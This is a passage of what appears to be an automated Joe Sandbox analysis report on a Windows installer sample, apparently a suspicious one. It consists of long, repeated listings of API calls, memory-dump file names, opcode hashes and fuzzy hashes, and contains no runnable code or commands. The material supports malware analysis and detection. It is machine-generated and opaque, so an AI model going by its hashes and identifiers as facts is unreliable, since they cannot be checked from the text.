                                                                                                                          • RegCloseKey.KERNELBASE(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004061A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue
                                                                                                                          • String ID: : Completed
                                                                                                                          • API String ID: 3356406503-2954849223
                                                                                                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                          • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                                                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                          • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 00405880
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                          • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                                                          • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                          • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                          • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                                                          • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                          • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                          • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                                                                          • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                          • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                          • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                                                          • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                          • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                          • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                                                          • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                          • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                          • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                                                          • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                          • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                          • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                                                          • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                          • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                          • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                                                                          • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                          • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree
                                                                                                                          • String ID: Polystichoid
                                                                                                                          • API String ID: 3394109436-2603710711
                                                                                                                          • Opcode ID: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
                                                                                                                          • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                                                                                          • Opcode Fuzzy Hash: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
                                                                                                                          • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                            • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                          • GetFileVersionInfoSizeW.KERNELBASE(00000009,00000000,?,000000EE), ref: 00401FA2
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FC1
                                                                                                                            • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520467145-0
                                                                                                                          • Opcode ID: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
                                                                                                                          • Instruction ID: 280eb5e8334f411f39d8c2fef6e633d2853c014e7ace8d4ea398df577ea4e561
                                                                                                                          • Opcode Fuzzy Hash: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
                                                                                                                          • Instruction Fuzzy Hash: A7114A71A00208BFDB01AFA5DD89E9EBBB5EF44314F11402AF505F62A1EB768951DB28
                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                                                          • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                                                                          • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                                                          • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                                                                          APIs
                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2831762973-0
                                                                                                                          • Opcode ID: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
                                                                                                                          • Instruction ID: c64e159aaddbf3301d14cafd97046592125c01172a1cc8aad3b5dad300b5ea2c
                                                                                                                          • Opcode Fuzzy Hash: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
                                                                                                                          • Instruction Fuzzy Hash: 2FF0FC32E041109BE700BBA49B8DABE72A49B44314F25003FFE02F31C1C9F84D41576D
                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004053CF
                                                                                                                            • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 0040541B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeMessageSendUninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2896919175-0
                                                                                                                          • Opcode ID: 525bb05d90f4df8801b08e6467920f577611c358328cee9ceb5e9014414f017a
                                                                                                                          • Instruction ID: 4b94bb8cc29b616b14fe2b60cd95aa592b1dcb8787795d26918334c9d59b584e
